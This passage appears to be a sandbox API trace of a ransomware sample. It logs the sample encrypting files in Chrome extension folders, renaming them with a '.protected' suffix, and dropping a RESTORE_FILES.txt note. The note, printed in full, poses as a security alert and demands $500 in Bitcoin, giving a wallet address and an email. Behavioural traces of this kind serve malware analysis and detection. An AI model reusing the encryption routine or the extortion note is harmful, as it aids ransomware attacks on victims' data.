(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.833] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.833] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.833] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.833] CloseHandle (hObject=0x164) returned 1 [0078.834] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="Windows") returned -1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="Program Files") returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="Program Files (x86)") returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="$Recycle.bin") returned 1 [0078.834] lstrcmpiW (lpString1="vi", lpString2="System Volume Information") returned 1 [0078.834] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned 141 [0078.834] lstrcmpW (lpString1="vi", lpString2=".") returned 1 [0078.834] lstrcmpW (lpString1="vi", lpString2="..") returned 1 [0078.834] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*") returned 143 [0078.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.835] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.835] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.835] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.835] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\.") returned 143 [0078.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.835] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.835] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.835] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.835] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.835] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.835] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.835] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\..") returned 144 [0078.835] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.835] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.835] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.835] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.835] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.835] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.835] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.835] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.836] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.836] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.836] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.836] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0078.836] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.836] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0078.837] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.837] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.837] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.837] CloseHandle (hObject=0x168) returned 1 [0078.837] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.protected") returned 165 [0078.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.protected")) returned 1 [0078.837] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.837] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.837] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0078.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.838] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.838] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.838] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.838] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.839] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.839] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.839] CloseHandle (hObject=0x164) returned 1 [0078.839] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0078.839] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned 144 [0078.839] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0078.839] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0078.839] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*") returned 146 [0078.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.839] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.839] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.839] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.839] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.839] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.839] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\.") returned 146 [0078.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.839] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.839] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.839] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.839] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.839] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.839] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.839] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\..") returned 147 [0078.839] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.840] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.840] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.840] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.840] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.840] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.840] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.840] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.841] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.841] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.841] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.841] CloseHandle (hObject=0x168) returned 1 [0078.841] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0078.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0078.842] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.842] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.842] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0078.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.842] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.842] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.843] lstrlenA 